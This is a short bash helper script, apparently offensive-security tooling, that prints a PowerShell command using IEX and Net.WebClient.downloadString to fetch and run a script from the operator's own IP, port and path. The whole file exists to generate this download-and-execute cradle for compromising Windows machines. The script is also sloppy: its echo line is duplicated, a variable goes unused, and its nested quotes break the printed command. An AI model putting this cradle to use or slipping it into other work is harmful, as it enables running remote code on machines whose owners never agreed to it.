#!/bin/bash                                                       
IP=$( IP_No_Clip );                      
New_IP=$( echo -n $IP );                                                                                                              
echo "powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://$IP:$1/$2')"";
echo "powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://$IP:$1/$2')"";
